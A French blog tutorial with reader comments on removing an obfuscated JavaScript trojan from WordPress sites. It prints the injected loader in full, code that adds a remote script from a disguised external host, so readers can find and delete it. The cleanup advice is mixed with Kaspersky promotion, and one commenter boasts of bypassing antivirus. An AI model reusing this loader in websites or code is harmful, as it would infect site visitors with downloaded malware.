NETTOYER SON BLOG DES VIRUS TROJAN
Je change un peu de sujet pour vous expliquer comment faire pour effacer définitivement d’un certain type de virus (et d’autre) qui infecte les sites wordpress.
Mais avant toute chose je permet de vous conseiller d’acheter ou au moins d’essayer le logiciel Kaspersky Antivirus qui, pour moi, est le meilleur de tous les antivirus ( et j’en ai essayer un paquet!)
que ce soit au niveau performance, stabilité et légéreté.
C’est par là que commencera votre désinfection ou protection…
Revenons en au blog wordpress infecté….
Ces virus injecte du code dans vos fichiers wordpress mais aussi tout autre qui se présente sous cette forme : les fichiers index.php, index.html , default.php , default.html et *.js.
Ce sont des malware « Obfuscated Scripts » ( traduction française ???) et se nomme Trojan.Downloader.JS.Agent,JS Redirector, JSObfuscated
Les symptômes des trojans :
- Lorsque vous consultez votre blog une page blanche s’affiche avec ce texte (exemple) : Parse error: syntax error, unexpected ‘<’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034
- ou Warning: Cannot modify header information – headers already sent by (output started at /homexxx/xxx/www/xxx/WordPress/wp-includes/default-filters.php:214) in /homexxx/xxx/www/xxx/WordPress/wp-includes/pluggable.php on line 865
- Lorsque vous accédez à votre Tableau de Bord WordPress vous êtes redirigé vers une autre adresse la plupart du temps inaccessible
- Votre antivirus (et donc celui de vos lecteurs) vous signal des alertes Trojan
- Le navigateur affiche ceci quand vous accédez avec blog wordpress
Solutions inefficaces au virus wordpress 
:
- Scanner votre site avec un script antivirus qui ne nettoiera qu’à moitié comme expliqué ici http://forum.avast.com/index.php?topic=52476.0
- Sur certain site il est expliqué qu’il faut supprimer le code
/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement(’script’);Jqjzlgspz98uxl.setAttribute(’type’, ‘text/javascript’);Jqjzlgspz98uxl.setAttribute(’id’, ‘myscript1?);Jqjzlgspz98uxl.setAttribute(’src’, ‘h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!’.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ”));Jqjzlgspz98uxl.setAttribute(’defer’, ‘defer’);document.body.appendChild(Jqjzlgspz98uxl);}} catch(e) {}
qui se trouve à la fin de chaque fichiers qui vous sera mis en erreur lors de la consultation de votre blog. Par exemple Parse error: syntax error, unexpected ‘<’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034
dans ce cas allez dans Filezilla par exemple, éditer votre fichier « default-widgets.php » et effacer ce bout de code code script qui se trouve à la fin , le remplacer par ?> pour terminer le fichier, sauvegarder et retourner sur votre blog pour le fichier suivant et ainsi de suite……
Mais cela n’est pas efficace car le trojan se trouve aussi dans les fichiers *.js mais aussi et c’est le plus important sur votre disque dur! Alors que faire?
Solutions efficaces au virus wordpress :
- Installer un bon antivirus par exemple Kaspersky Internet Security QUE VOUS POUVEZ VOUS PROCURER JUSTE A DROITE TOUT EN BAS DU TUTO (c’est vraiment un logiciel excellent)
- Scanner votre ou vos disques durs (ça peut être long mais c’est obligatoire)
- Scanner votre base de donnée au cas où il y aurait un code malicieux injecté avec ceci : allez dans votre base de donnée avec PhpMyadmin puis lancez les requêtes SQL suivante :
SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'
et effacer le contenu infecté
4. Faire un backup de votre base donnée (tuto ici) avec ce plugin WordPress Database Backup téléchargeable ici gratuitement http://ilfilosofo.com/downloads/plugins/wp-db-backup.zip
5. Faire un export de vos articles dans Outils / Exporter / Télécharger le fichier d’export
6. Changer vos mot de passe FTP , base de donnée (vous devez alors mettre à jour le fichier wp-config.php) et wordpress : pas forcément des mot de passe compliqués mais avec des majuscules et chiffres c’est mieux.
7. Très important : n’enregistrez plus vos mot de passe FTP dans FileZilla (par exemple) car c’est par là que le trojan injecte les codes!!! et notez les mots de passe sur du papier…
-> dans « Types d’authentification » mettez « Demander un mot de passe » et je pense que vous pouvez cocher « Mémoriser pour cette session » mais si vous voulez être très prudent ne le cochez pas.
8. Noter dans un coin vos plugins et hèmes dont vous aurez besoin plus tard ainsi que leurs paramètre de configuration
9. Faire un backup de vos fichiers images stockés dans wp-content/uploads/….
10. Faire un backup des fichiers wp-config.php , sitemap.xml , sitemap.xml.gz , robots.txt , .htaccess (s’il existe bien sûr)
11. Vous allez prendre peur mais vous devez maintenant effacer votre installation wordpress c’est à dire tous les fichiers ainsi que les répertoires. Ne vous inquiétez pas vos articles sont saufs
12. Télécharger la dernière version de wordpress ici http://www.wordpress-fr.net/telechargements et la copier sur votre serveur
13. Copier wp-config.php , sitemap.xml , sitemap.xml.gz , robots.txt , .htaccess (vérifier que ce fichier ne contient pas de code malicieux) et les fichiers images stockés dans wp-content/uploads/….
14. Retélécharger vos plugins et thèmes et passez les au scan antivirus
15. Télécharger et installer ces plugins Antivirus WordPress http://downloads.wordpress.org/plugin/antivirus.zip WP Security Scan http://downloads.wordpress.org/plugin/wp-security-scan.zip
16. Utiliser ces permissions CHMOD : 755 pour les répertoires et 644 pour les fichiers
17. Pour être encore plus prudent vous pouvez même changer encore vos de passe FTP, base donnée et wordpress
18. Ne plus utiliser Filezilla ( mot de passe non crypté et stocké dans un fichier txt) mais plutôt FlashFXP ou FTPRush
19. Faire attention aux script utilitairex hackés (NULLED SCRIPT) qui peuvent contenir des virus!
Voilà votre blog est nettoyé et vous avez encore vos articles
Mise à jour du samedi 10 avril 2010 :
VERSION LIGHT DU TUTORIAL :
-> effectuer toutes les étapes sauf la 11
-> remplacer les script malicieux dans les fichiers php découvert par vos soins (un peu long quand même) ou remplacer les fichiers par des tous neufs (de même version bien sûr)
-> remplacer tous les fichiers .JS
POUR ACHETER KASPERSKY ANTIVIRUS C’EST PAR LA (29.95€ le moins chère est largement nécessaire)
ce tuto est protégé alors merci de me citer en tant que source si vous diffusez ce tuto sur votre site. Merci
tres interessant, merci
merci
j’en étais sur que c’était filezilla
j’ai eu pas mal de souci avec ce virus
merci pour ces explications,
j’ai pu remettre d’aplomb mon site,
cela fait 2 fois que j’ai eu des problèmes d’erreurs de ce genre, mais je pensais que cela venais d’une erreur de mise à jour wordpress, mais cette fois mes fichiers étaient bien infectés, je devais avoir au moins une cinquantaine de fichiers vérolés
cette fois jechange tous mes mots de passe et surtout j’installe les pluguns antivirus
merci encore
Salut,
J’ai un gros souci. Tout mes sites ont été attaqués. J’en ai une petite dizaine.
http://www.bons-plans-cote-ouest.com/
http://www.pret-vert.com/
http://www.plan-d-epargne-logement.com/
….
Et toujours le même problème.
Une solution?
En sachant que je suis chez OVH.
Merci d’avance
Bonsoir, lorsque ce message s’affiche à l’ouverture de votre site : « Parse error: syntax error, unexpected ‘< ' in /homez.57/informat/bons-plans-cote-ouest.com/wp-includes/default-filters.php on line 229"
cela signifie qu'à la fin de default-filters.php se trouve un script malicieux qui ne termine pas correctement le fichier donc la solution efficace à 50% c'est de supprimer ce script et de le remplacer par ?>.
Voir la version light du tuto si vous ne voulez pas effacer tous le contenu du site.
Bon courage.
Bonjour.
Comment est-ce que je peux installer le plugin et faire une archive de mes articles si je n’ai pas accés à l’interface admin de mon blog ?
(Je vous parle des premieres étapes, si j’ai bien tout compris le reste des backups a faire se fait au niveau du ftp c’est bien ça ?)
Merci d’avance.
A.
J’ai eu le même problème, réinstallation total de WP (mais sauvegarde du fichier config, robots, etc) et plus rien! OUF
bonjour Anouar , désolé pour le retard (beaucoup de taf!). C’est une très bonne remarque et 2 solutions :
1)si votre site s’affiche comme ceci « Parse error: syntax error, unexpected ‘< ’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034″ (c’est un exemple)
alors allez voir dans le fichier default-widgets.php ou autre bien sûr et supprimer le bou de code qui se trouve à la fin et remplacer le par ?> et ainsi se suite pour chaque fichier qui va s’afficher de cette façon. Ainsi vous aurez accès à votre site (partiellement nettoyé) pour faire votre backup et continuer les étapes.
ou
2)faire un backup de votre base de donnée via Phpmyadmin, je ne mis suis pas encore penché alors voici un tuto parmi d’autre : http://ainsi-bloggait-zarathoustra.fr/2008/08/21/exporter-importer-une-base-de-donnees/
J’espère vous avoir aidé…
Bonjour, je viens de suivre ce tuto très interessant pour protéger mon wordpress nouvellement installé. J’ai installé les plugins conseillés et j’ai un petit souci, ne voulant pas faire d’erreur.
WP – Database Security me dit :
Make a backup of your database before using this tool:
Change your database table prefix to mitigate zero-day SQL Injection attacks.
Before running this script:
* wp-config must be set to writable before running this script.
* the database user you’re using with WordPress must have ALTER rights
Change the current: prefix to something different if it’s the default wp_
Allowed Chars are all latin Alphanumeric Chars as well as the Chars – and _.
J’avoue que je suis perdue, si quelqu’un peut me conseiller ???
Merci
bonjour,
Je vais faire un petit tuto pour faire le backup de votre base donnée
Vous le trouverez ici
Merci pour votre question et à bientôt…
[...] un petit tuto en complément de celui-ci Cette entrée a été posté par Franck le 24 août 2010 à 0 h 56 min, et placée dans [...]
[...] fonction de l’administration ne fonctionnais plus. Après avoir cherché des informations et solutions sur ce cheval de Troie, j’ai appris qu’il valait mieux tout supprimer et [...]
Thank you, that was extremely valuable and interesting…I will be back again to read more on this topic.
Salut
Je bloque à l’étape 3. je fais un copie-coller de chacune des requêtes et je clique sur exécuter. À chaque fois, je reçois comme message: No database selected. Comment ça marche?
Pouvez-vous aider une débutante?
Merci.
Merci pour cette aide précieuse.
Mais de rien…
Sauf que votre requète google pour accéder à mon site était laissez un commentaire wp-comment nom site web -nofollow
et de + vous n’avez pas de site WP ====> backlink mal car je l’ai detecté facilement.
Je n’ai rien contre ça en général mais si je le repère je vire le lien…et j’essaie votre requète;-)
Tu utilise kaspersky? c’est un peut de la « chiotte » je dirais. J’étudie est crée des fichier malveillant depuis 6ans et je peut partager vite fait mon avis sur kaspersky.
Kaspersky est juste pour moi (et le plus grand nombre de mes confrères) très simple à bypassed. Un peu comme tout les AV, mais personnellement, quand sa se corse c’est bien car Avira ou Norton existe.
Bref, j’ai jamais passer + de 10minut à bypass un AV comme Kaspersky, contrairement à Norton et Avira ou j’y suis parfois rester quelque heures.
Au final: Avira ou Norton.
En ajoutant que aucun antivirus detect tout les virus qu’un autres antivirus detect
il on tous des bases d’empreinte différente. Bien-sûr certain virus sont detect par plusieurs AV, mais ce n’est pas ce que j’ai dit exactement.
Donc voilà. Perso, quand j’voit les gens qui disent que Avast est mieux que Avira, car avast a supprimé un virus sur leur pc que avira n’avez pas vue, sa me rend fou
car il faut qu’il sache que avira detected forcément lui aussi des virus que avast ne detectera pas (et inversement)
Passer a un firewall logistique, car franchement les antivirus sa sert à presque rien
Car de nos jour (depuis quelque temp déja) tout les gens crypt leur malware avant de les propagé sur la toile, crypted et donc undetected par les Antivirus (pendant un certain temps, sa peut duré 1jour comme 1ans et +, peut pas tout expliquer ici :d) .
Puis les connerie comme j’entend à la TV et ailleur genre « si on ce connect a internet 20minut sans antivirus on est infecté », sa c’est complétement faux mais alors… je sais même pas comment il peuvent ce permettre de dire de tel connerie. Après c’est sûr que si les gens qui font ce genre de test, sont connecter a internet avec un win98, tout service activée, et qu’il cris sur tout les forum de noob « pirater moi 76.33.54.12, win98″ bien la oui il ce peut que dans les 20minut qui suive quelqu’un le pirate, et encore c’est même pas sûr.
J’utilise Kaspersky car ça fait longtemps que je suis dessus mais c’est vrai que je changerai bien pour Avira…
De plus , il est vrai que j’utilise un firewall (Kerio) qu’il faut bien paramétré et après c’est le « top ».
Par contre je me demande comment le code obfuscé est injecté dans les fichiers php :
- le virus en local a accés au ftp via filezilla qui n’est pas protégé et injecte le code un peu partout ou
- un virus online chopé avec des scripts piraté qui fait le boulot
Je penche plus sur la 1ère solution car une fois après avoir nettoyé les fichiers php + le pc + changement et suppression mot de passe ftp dans filezilla alors j’ai plus de problème…
En tout cas merci pour les conseils!